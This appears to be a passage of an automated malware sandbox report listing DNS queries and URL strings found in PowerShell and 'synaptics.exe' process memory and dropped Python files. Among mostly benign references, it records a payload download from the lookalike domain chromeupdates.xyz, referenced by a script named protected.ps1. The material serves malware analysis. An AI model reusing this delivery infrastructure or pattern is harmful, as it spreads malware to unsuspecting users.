https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; frame-ancestors 'self' https://*.dropbox.com ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; style-src https://* 'unsafe-inline' 'unsafe-eval' equals www.yahoo.com (Yahoo)
Source: global trafficDNS traffic detected: DNS query: chromeupdates.xyz
Source: global trafficDNS traffic detected: DNS query: www.dropbox.com
Source: global trafficDNS traffic detected: DNS query: ucdfbc3902915a267069329ce5e2.dl.dropboxusercontent.com
Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
Source: powershell.exe, 00000000.00000002.2376887692.0000015C02416000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0240A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0242A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.168.0.1/Python/interrupt/test.asp
Source: powershell.exe, 00000000.00000002.2376887692.0000015C0244D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0246B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C02457000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.168.0.1/Python/interrupt/test1.asp
Source: powershell.exe, 00000000.00000002.2376887692.0000015C019E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C019D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://artax.karlin.mff.cuni.cz/~mikulas/links/
Source: _mode_gcm.py.0.drString found in binary or memory: http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.html
Source: platform.py.0.drString found in binary or memory: http://bugs.python.org)
Source: powershell.exe, 00000000.00000002.2376887692.0000015C013A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C013AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/issue10811
Source: powershell.exe, 00000000.00000002.2376887692.0000015C0158E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/issue14396.
Source: powershell.exe, 00000000.00000002.2376887692.0000015C013A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C013AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/issue14720
Source: powershell.exe, 00000000.00000002.2376887692.0000015C0158E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/issue15756
Source: synaptics.exe, 00000007.00000003.2374767343.0000000000B1F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000007.00000003.2376940988.0000000000B16000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000007.00000003.2374931652.0000000000B12000.00000004.00000020.00020000.00000000.sdmp, codecs.py.0.drString found in binary or memory: http://bugs.python.org/issue19619
Source: powershell.exe, 00000000.00000002.2376887692.0000015C01506000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/issue24068.
Source: powershell.exe, 00000000.00000002.2376887692.0000015C011EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C011F4000.00000004.00000800.00020000.00000000.sdmp, synaptics.exe, 00000007.00000003.2378074084.0000000000B22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/issue5845#msg198636
Source: powershell.exe, 00000000.00000002.2376887692.0000015C01B6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/issue6857.
Source: powershell.exe, 00000000.00000002.2376887692.0000015C016E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/issue874900
Source: powershell.exe, 00000000.00000002.2376887692.0000015C01CAF000.00000004.00000800.00020000.00000000.sdmp, _msi.pyd.0.dr, select.pyd.0.dr, _uuid.pyd.0.dr, _decimal.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: powershell.exe, 00000000.00000002.2376887692.0000015C01CAF000.00000004.00000800.00020000.00000000.sdmp, _msi.pyd.0.dr, select.pyd.0.dr, _uuid.pyd.0.dr, _decimal.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: powershell.exe, 00000000.00000002.2376887692.0000015C01CAF000.00000004.00000800.00020000.00000000.sdmp, _msi.pyd.0.dr, select.pyd.0.dr, _uuid.pyd.0.dr, _decimal.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: powershell.exe, 00000000.00000002.2376887692.0000015C01CAF000.00000004.00000800.00020000.00000000.sdmp, _msi.pyd.0.dr, select.pyd.0.dr, _uuid.pyd.0.dr, _decimal.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: heapq.py.0.drString found in binary or memory: http://code.activestate.com/recipes/577573-compare-algorithms-for-heapqsmallest
Source: svchost.exe, 00000009.00000002.3306223761.000002854208D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: powershell.exe, 00000000.00000002.2376887692.0000015C01CAF000.00000004.00000800.00020000.00000000.sdmp, _msi.pyd.0.dr, select.pyd.0.dr, _uuid.pyd.0.dr, _decimal.pyd.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: powershell.exe, 00000000.00000002.2376887692.0000015C01CAF000.00000004.00000800.00020000.00000000.sdmp, _msi.pyd.0.dr, select.pyd.0.dr, _uuid.pyd.0.dr, _decimal.pyd.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: powershell.exe, 00000000.00000002.2376887692.0000015C01CAF000.00000004.00000800.00020000.00000000.sdmp, _msi.pyd.0.dr, select.pyd.0.dr, _uuid.pyd.0.dr, _decimal.pyd.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: _decimal.pyd.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: powershell.exe, 00000000.00000002.2376887692.0000015C01CAF000.00000004.00000800.00020000.00000000.sdmp, _msi.pyd.0.dr, select.pyd.0.dr, _uuid.pyd.0.dr, _decimal.pyd.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: test_GCM.py.0.drString found in binary or memory: http://csrc.nist.gov/groups/ST/toolkit/BCM/documents/proposedmodes/gcm/gcm-revised-spec.pdf
Source: _mode_gcm.py.0.drString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38D/SP-800-38D.pdf
Source: powershell.exe, 00000000.00000002.2376887692.0000015C01506000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dx.doi.org/10.1080/03610928908830127
Source: powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edge-block-www-env.dropbox-dns.com
Source: svchost.exe, 00000009.00000003.2383892842.0000028541D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: client.py.0.drString found in binary or memory: http://foo.com/
Source: client.py.0.drString found in binary or memory: http://foo.com:/
Source: powershell.exe, 00000000.00000002.2376887692.0000015C016E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/j2se/1.5.0/docs/api/java/util/concurrent/
Source: optparse.py.0.drString found in binary or memory: http://lists.sourceforge.net/lists/listinfo/optik-users).
Source: powershell.exe, 00000000.00000002.2376887692.0000015C019E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C019D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://lynx.browser.org/
Source: powershell.exe, 00000000.00000002.2376887692.0000015C019E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C019D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://lynx.isc.org/
Source: powershell.exe, 00000000.00000002.2376887692.0000015C01506000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mathworld.wolfram.com/SampleVariance.html
Source: powershell.exe, 00000000.00000002.2376887692.0000015C01506000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mathworld.wolfram.com/Variance.html
Source: powershell.exe, 00000000.00000002.2443745513.0000015C10072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2443745513.0000015C101B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: RSA.py.0.drString found in binary or memory: http://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.186-4.pdf
Source: powershell.exe, 00000000.00000002.2376887692.0000015C01CAF000.00000004.00000800.00020000.00000000.sdmp, _msi.pyd.0.dr, select.pyd.0.dr, _uuid.pyd.0.dr, _decimal.pyd.0.drString found in binary or memory: http://ocsp.digicert.com0
Source: powershell.exe, 00000000.00000002.2376887692.0000015C01CAF000.00000004.00000800.00020000.00000000.sdmp, _msi.pyd.0.dr, select.pyd.0.dr, _uuid.pyd.0.dr, _decimal.pyd.0.drString found in binary or memory: http://ocsp.digicert.com0A
Source: powershell.exe, 00000000.00000002.2376887692.0000015C01CAF000.00000004.00000800.00020000.00000000.sdmp, _msi.pyd.0.dr, select.pyd.0.dr, _uuid.pyd.0.dr, _decimal.pyd.0.drString found in binary or memory: http://ocsp.digicert.com0C
Source: powershell.exe, 00000000.00000002.2376887692.0000015C01CAF000.00000004.00000800.00020000.00000000.sdmp, _msi.pyd.0.dr, select.pyd.0.dr, _uuid.pyd.0.dr, _decimal.pyd.0.drString found in binary or memory: http://ocsp.digicert.com0X
Source: plistlib.py.0.drString found in binary or memory: http://opensource.apple.com/source/CF/CF-744.18/CFBinaryPList.c
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: platform.py.0.drString found in binary or memory: http://php.net/manual/en/function.version-compare.php
Source: pathlib.py.0.drString found in binary or memory: http://pubs.opengroup.org/onlinepubs/009695399/basedefs/xbd_chap04.html#tag_04_11
Source: powershell.exe, 00000000.00000002.2376887692.0000015C01E88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C00556000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pyfpdf.googlecode.com/)
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00F1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://shellrevealed.com/blogs/shellblog/archive/2007/03/15/Shell-Namespace-Extension_3A00_-Creating
Source: powershell.exe, 00000000.00000002.2376887692.0000015C016E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sourceware.org/pthreads-win32/manual/pthread_barrier_init.html
Source: powershell.exe, 00000000.00000002.2376887692.0000015C006F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://starship.python.net/crew/mhammond/win32/PrivacyProblem.html
Source: README.ctypes.0.drString found in binary or memory: http://svn.red-bean.com/bob/macholib/trunk/macholib/
Source: client.py.0.drString found in binary or memory: http://tools.ietf.org/html/rfc5234#appendix-B.1
Source: KDF.py.0.drString found in binary or memory: http://tools.ietf.org/html/rfc5297
Source: KDF.py.0.drString found in binary or memory: http://tools.ietf.org/html/rfc5869
Source: client.py.0.drString found in binary or memory: http://tools.ietf.org/html/rfc7230#section-3.2)
Source: powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ucdfbc3902915a267069329ce5e2.dl.dropboxusercontent.com
Source: powershell.exe, 00000000.00000002.2376887692.0000015C019E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C019D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://w3m.sourceforge.net/
Source: pathlib.py.0.drString found in binary or memory: http://web.archive.org/web/20200623061726/https://bitbucket.org/pitrou/pathlib/issues/12/
Source: powershell.exe, 00000000.00000002.2376887692.0000015C01E54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www-env.dropbox-dns.com
Source: RSA.py.0.drString found in binary or memory: http://www.alvestrand.no/objectid/1.2.840.113549.1.1.1.html
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: plistlib.py.0.drString found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00BFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C00C1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C00C0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.codeproject.com/internet/mapadmin.asp
Source: powershell.exe, 00000000.00000002.2376887692.0000015C01CAF000.00000004.00000800.00020000.00000000.sdmp, _msi.pyd.0.dr, select.pyd.0.dr, _uuid.pyd.0.dr, _decimal.pyd.0.drString found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 00000000.00000002.2376887692.0000015C01E54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.dropbox.com
Source: test_Salsa20.py.0.drString found in binary or memory: http://www.ecrypt.eu.org/stream/svn/viewcvs.cgi/ecrypt/trunk/submissions/salsa20/full/verified.test-
Source: platform.py.0.drString found in binary or memory: http://www.egenix.com/files/python/platform.py
Source: platform.py.0.drString found in binary or memory: http://www.geocities.com/rick_lively/MANUALS/ENV/MSWIN/PROCESSI.HTM
Source: gzip.py.0.drString found in binary or memory: http://www.gzip.org/#faq8
Source: powershell.exe, 00000000.00000002.2376887692.0000015C0166B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01639000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/telnet-options
Source: powershell.exe, 00000000.00000002.2376887692.0000015C014C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
Source: RSA.py.0.drString found in binary or memory: http://www.ietf.org/rfc/rfc1421.txt
Source: RSA.py.0.drString found in binary or memory: http://www.ietf.org/rfc/rfc1423.txt
Source: RSA.py.0.drString found in binary or memory: http://www.ietf.org/rfc/rfc3447.txt
Source: RSA.py.0.drString found in binary or memory: http://www.ietf.org/rfc/rfc5208.txt
Source: powershell.exe, 00000000.00000002.2376887692.0000015C01506000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.johndcook.com/blog/2008/09/26/comparing-three-methods-of-computing-standard-deviation/
Source: handlers.py.0.drString found in binary or memory: http://www.nightmare.com/squirl/python-ext/misc/syslog.py
Source: powershell.exe, 00000000.00000002.2376887692.0000015C01B2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01B38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.planetpublish.com/xmlarena/xap/Thursday/WordtoXML.pdf
Source: powershell.exe, 00000000.00000002.2376887692.0000015C007D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.python.org
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00A2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.python.org/favicon.ico
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00A41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C00A1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C00A2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.python.org/missing-favicon.ico
Source: pydoc.py.0.drString found in binary or memory: http://www.rfc-editor.org/rfc/rfc%d.txt
Source: powershell.exe, 00000000.00000002.2376887692.0000015C01909000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C018FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.robotstxt.org/norobots-rfc.txt
Source: test_Blowfish.py.0.drString found in binary or memory: http://www.schneier.com/code/vectors.txt
Source: powershell.exe, 00000000.00000002.2376887692.0000015C01909000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C018FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sitemaps.org/protocol.html
Source: KDF.py.0.drString found in binary or memory: http://www.tarsnap.com/scrypt/scrypt-slides.pdf
Source: test_number.py.0.drString found in binary or memory: http://www.trnicely.net/misc/mpzspsp.html
Source: powershell.exe, 00000000.00000002.2376887692.0000015C01771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://zooko.com/
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://a.sprig.com/
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/gsi/client
Source: powershell.exe, 00000000.00000002.2376887692.0000015C0120A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aiosmtpd.readthedocs.io/)
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.login.yahoo.com/
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://app.hellofax.com/
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://app.hellosign.com/
Source: powershell.exe, 00000000.00000002.2376887692.0000015C0158E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue25942
Source: selectors.py.0.drString found in binary or memory: https://bugs.python.org/issue29255
Source: powershell.exe, 00000000.00000002.2376887692.0000015C011EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C011F4000.00000004.00000800.00020000.00000000.sdmp, synaptics.exe, 00000007.00000003.2378074084.0000000000B22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue29585
Source: powershell.exe, 00000000.00000002.2376887692.0000015C01527000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01536000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue31672
Source: pathlib.py.0.drString found in binary or memory: https://bugs.python.org/issue39682
Source: ftplib.py.0.drString found in binary or memory: https://bugs.python.org/issue43285
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://canny.io/sdk.js
Source: powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cfl.dropboxstatic.com/static/
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromeupdates.xyz
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, protected.ps1String found in binary or memory: https://chromeupdates.xyz/cum/synaptics.zip
Source: powershell.exe, 00000000.00000002.2443745513.0000015C101B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.2443745513.0000015C101B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.2443745513.0000015C101B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl-web.dropbox.com/
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/fsip/
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/fsip/
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/fsip/
Source: pydoc.py.0.drString found in binary or memory: https://docs.python.org/
Source: pydoc.py.0.drString found in binary or memory: https://docs.python.org/%d.%d/library
Source: __init__.py45.0.drString found in binary or memory: https://docs.python.org/3.3/howto/logging.html#configuring-logging-for-a-library
Source: synaptics.exe, 00000007.00000002.2399126626.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000007.00000003.2395242758.0000000000B7E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000007.00000003.2395633023.0000000000B7F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000007.00000002.2398743187.0000000000B80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/reference/import.html#__path__
Source: pydoc.py.0.drString found in binary or memory: https://docs.python.org/X.Y/library/
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/document/fsip/
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/presentation/fsip/
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/spreadsheets/fsip/
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docsend.com/
Source: test_GCM.py.0.drString found in binary or memory: https://eprint.iacr.org/2013/157.pdf
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://experience.dropbox.com/
Source: RSA.py.0.drString found in binary or memory: https://flak.tedunangst.com/post/new-openssh-key-format-and-bcrypt-pbkdf
Source: powershell.exe, 00000000.00000002.2376887692.0000015C011D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C011CB000.00000004.00000800.00020000.00000000.sdmp, synaptics.exe, 00000007.00000003.2395189100.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000007.00000003.2395047103.0000000000AFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/blob/be829135bc0d758997b3566062999ee8b23872b4/lib-python/3/sit
Source: svchost.exe, 00000009.00000003.2383892842.0000028541DD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000009.00000003.2383892842.0000028541D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: powershell.exe, 00000000.00000002.2376887692.0000015C01273000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gist.github.com/4325783
Source: __init__.py45.0.drString found in binary or memory: https://github.com/Ousret/charset_normalizer
Source: powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
